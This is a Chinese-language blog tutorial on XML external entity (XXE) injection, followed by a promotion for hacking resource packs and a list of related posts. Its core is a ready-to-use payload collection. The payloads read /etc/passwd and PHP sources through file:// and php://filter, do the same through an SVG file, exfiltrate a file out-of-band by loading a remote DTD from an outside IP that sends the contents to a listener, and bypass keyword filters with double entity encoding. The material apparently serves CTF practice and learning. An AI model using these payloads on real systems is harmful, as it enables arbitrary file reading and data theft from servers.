渗透攻击零基础学习-XXE(非常详细)零基础入门到精通,收藏这一篇就够了

最新推荐文章于 2025-06-08 13:30:00 发布
最新推荐文章于 2025-06-08 13:30:00 发布
阅读量375 收藏 4
点赞数 8
分类专栏: 计算机 互联网 网络安全 文章标签: 学习 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Python_0011/article/details/136038080
版权

XXE

XXE ( PHP 5.45之后不解析实体 )

<!DOCTYPE 根标签名 SYSTEM "文件名">

DTD实体是用于定义引用文本或字符的快捷方式的变量,可内部声明或外部引用。

约束通过类别关键词 ANY 声明的元素,可包含任何可解析数据的组合:

<!ELEMENT 标签名 ANY>

同时xxe可进行内网探测读取 /etc/hosts

Payload

PHP文件读取

<?xml version="1.0" encoding="utf-8"?>   
<!DOCTYPE xxe [  
<!ELEMENT name ANY>  
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php">]>  
<creds>  
<user>&xxe;</user>  
</creds>

file协议读取文件

<?xml version="1.0"?>  
<!DOCTYPE GVI [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>  
<catalog>  
    	<core id="test101">  
     		<description>&xxe;</description>  
  		</core>  
</catalog>

SVG格式

<?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE note [  
<!ENTITY file SYSTEM "要读取的文件路径" >  
]>  
<svg height="100" width="1000">  
  		<text x="10" y="20">&file;</text>  
</svg>

数据外带

<!DOCTYPE root [   
<!ENTITY % remote SYSTEM "http://174.1.66.167/shell.dtd">  
%remote;  
]>  
  
shell.dtd  
<!ENTITY % file SYSTEM "file:///flag">  
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://127.0.0.1:5555/?flag=%file;'>">  
%int;  
%send;

xxe绕过的payload

当只过滤了SYSTEM,PUBLIC等关键字时,可用双重实体编码绕过

<?xml version="1.0"?>  
  
<!DOCTYPE GVI [  
  
    <!ENTITY % xml "&#60;&#33;&#69;&#78;&#84;&#73;&#84;&#89;&#32;&#120;&#120;&#101;&#32;&#83;&#89;&#83;&#84;&#69;&#77;&#32;&#34;&#102;&#105;&#108;&#101;&#58;&#47;&#47;&#47;&#102;&#108;&#97;&#103;&#46;&#116;&#120;&#116;&#34;&#32;&#62;&#93;&#62;&#10;&#60;&#99;&#111;&#114;&#101;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#109;&#101;&#115;&#115;&#97;&#103;&#101;&#62;&#38;&#120;&#120;&#101;&#59;&#60;&#47;&#109;&#101;&#115;&#115;&#97;&#103;&#101;&#62;&#10;&#60;&#47;&#99;&#111;&#114;&#101;&#62;">  
  
    %xml;

即为在xml实体中再定义一次xml,可成功被解析,支持dtd数据外带

<!ENTITY xxe SYSTEM "file:///flag.txt" >]>  
<core>  
      <message>&xxe;</message>  
</core>

以上为编码部分内容

为了帮助大家更好的学习网络安全,我给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂这些资料!

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

PHP代码审计之XXE(XML外部实体注入)
qq_22132931的博客
12-08 932
PHP代码审计之XXE(XML外部实体注入)
xxe漏洞php代码审计1
m0_55772907的博客
05-01 703
(1)原理 XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害 xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件 (2)基础知识 XML 被设计为传输和存储数据,其焦点是数据的内容HTML 被设计用来显示数据,其焦点是数据的外观...
php xxe注入,XXE的原理利用方式及修复
weixin_26750831的博客
03-10 1217
注:本文仅供参考学习XXE定义:XXE,"xml external entity injection",即"xml外部实体注入漏洞"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题。XXE原理:服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入,造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击...
渗透测试】XXE(外部实体注入):PHP_XXE解题简记
weixin_53972936的博客
10-26 1785
XXE漏洞发生在应用程序解析XML输入时,并没有禁止外部实体的加载,当允许引用外部实体时,通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。
4、PHP的xml注入漏洞(xxe
weixin_51520483的博客
05-21 752
2、CTRL+f搜索xml,发现2.8.0版本,含有xml漏洞。5、在触发bug的包下面加上,获取flag。1、打开网页是一个PHP版本页面。青少年ctf:PHPXXE。4、使用代码出发bug。
多模态大模型入门指南(非常详细零基础入门精通收藏一篇
Hacker_doggy的博客
07-17 3406
如表1所示,对26 SOTA MM-LLMs的架构和训练数据集规模进行了全面比较。随后,简要介绍这些模型的核心贡献并总结了它们的发展趋势。代表了一系列视觉语言 (VL) 模型,旨在处理交错的视觉数据和文本,生成自由格式的文本作为输出。(2)BLIP-2引入了一个资源效率更高的框架,包括用于弥补模态差距的轻量级 Q-Former ,实现对冻结 LLMs 的充分利用。利用 LLMs,BLIP-2 可以使用自然语言提示进行零样本图像到文本的生成。(3)LLaVA。
最新RAG知识库问答的应用(非常详细)从零基础入门精通收藏这篇就
A1_3_9_7的博客
06-05 770
在信息爆炸的时代,企业面临着如何有效获取和利用知识的问题。基于RAG(Retrieval-Augmented Generation)知识库问答的应用,正是解决这一挑战的重要手段。RAG结合了信息检索和文本生成的优势,能在海量数据中快速提取相关信息,并生成高质量的回答。本文将探讨RAG知识库问答的业务方案及其在垂直应用领域的潜力。
什么是CSRF?CSRF漏洞原理攻击与防御(非常详细零基础入门精通收藏一篇
xiangxue888的博客
09-09 1812
什么是CSRF?CSRF漏洞原理攻击与防御(非常详细零基础入门精通收藏一篇
图解Transformer工作原理(非常详细零基础入门精通收藏一篇
nuoyan_7的博客
08-22 1028
Transformer 已经成为了前沿人 AI 技术的代名词,尤其是在自然语言处理(NLP)这一领域。那么,是什么使得 Transformer 能如此高效准确地掌握语言的复杂性呢?让我们一起深入探索 Transformer 架构的核心原理。但在此之前,不妨先看看它的应用场景。谷歌翻译:这个被广泛使用的工具在很大程度上依靠 Transformer 技术,实现了对超过 100 种语言的快速准确翻译。它能考虑到整个句子的上下文,而非仅仅是单个词语,使得翻译结果更加自然流畅。
7个顶级的免费IntelliJ IDEA实用插件(非常详细零基础入门精通收藏一篇
最新发布
logic1001的博客
06-08 786
7个实用的免费IntelliJ插件,提升你的Java开发之旅。长按关注《Java学研大本营》IDE:集成开发环境,是用于提供程序开发环境的应用程序。作为开发者,我们一直在寻找提高生产力和提升软件质量的方法。掌握IDE——理解它的技巧、快捷键和工具——是这一过程的关键部分。在这里,我们将深入探讨IntelliJ IDEA插件——这些神奇的附加组件可以提高你的工作效率,并对代码进行优化微调,以达到最佳效果。我们将探讨5个免费插件,它们旨在将你的开发水平提升到一个新的高度。现在让我们开始吧!
XXE详解
qq_51780583的博客
03-23 5558
XXE(XML External Entity Injection)全称为XML外部实体注入,由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取,系统命令执行,内网端口探测,攻击内网网站等危害。
[Vulhub] PHP环境 XML外部实体注入漏洞(XXE
weixin_45605352的博客
05-07 4282
0x01 预备知识 XXE是什么? XXE(XML External Entity Injection)也就是XML外部实体注入,XXE漏洞发生在应用程序解析XML输入时,XML文件的解析依赖libxml 库,而 libxml2.9 以前的版本默认支持并开启了对外部实体的引用,服务端解析用户提交的XML文件时,未对XML文件引用的外部实体(含外部一般实体和外部参数实体)做合适的处理,并且实体的URL支持 file:// 和 ftp:// 等协议,导致可加载恶意外部文件和代码,造成 任意文件读取、命令执行、
XXE漏洞详解
weixin_53440207的博客
03-08 939
xxe漏洞详解
XXE(外部实体注入)详解
2401_82576671的博客
01-23 2687
​ 应用程序在解析XML时没有过滤外部实体的加载,导致加载了恶意的外部文件,造成执行命令、读取文件、扫描内网、攻击内网等危害。​ 运维人员使用了低版本的php,libxml低于2.9.1或者设置了libxml_disable_entity_loader(False)就可以加载外部实体。将文档类型直接放入XML文档中,称为内部定义。内部定义格式:<!DOMCTYPE 根元素 [元素声明]>DOCTYPE note[ #定义跟根节点。
网络安全课第五节 XXE 漏洞的检测与防御
fegus的博客
07-11 1695
上一讲我们介绍了 SSRF 漏洞,一种专门针对服务端的请求伪造攻击,常被用于攻击内网。在里面我介绍了 Burp Collaborator 用于专门测试无回显漏洞的功能,在本讲的 XXE 漏洞测试中,我们依然可以使用,不知道你是否还记得怎么使用?下面,我们就开始今天的课程,一场关于 XML 外部实体注入(XXE)漏洞的攻防之路。XXE(XML External Entity,XML 外部实体注入)正是当允许引用外部实体时,通过构造恶意内容,导致读取任意文件、执行系统命令、内网探测与攻击等危害的一类漏洞。PHP
php代码审计之xxe
qq_42307546的博客
06-04 730
xml
xxe漏洞案例1-xxe lab for php
c0529的博客
05-04 1028
xxe lab是一个小的网站靶场,我们可以用这个网站对于xxe漏洞进行一个大致的了解。
XXE payload总结
ULGANOY的博客
09-03 1552
XXE payload的记录
XXE-Lab for PHP
An_anQ的博客
12-18 197
出现一个登录页面,输入任意 UserName 和 Psaaword ,使用bp抓取登录数据包。发现 username 位置为回显位,我们可以构造xxe攻击,具体操作如下。修改 username 和 password 的值,查看右边的变化。只修改 username 的值,查看右边的变化。只修改 password 的值,查看右边的变化。发送到重放器,点击“发送”
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值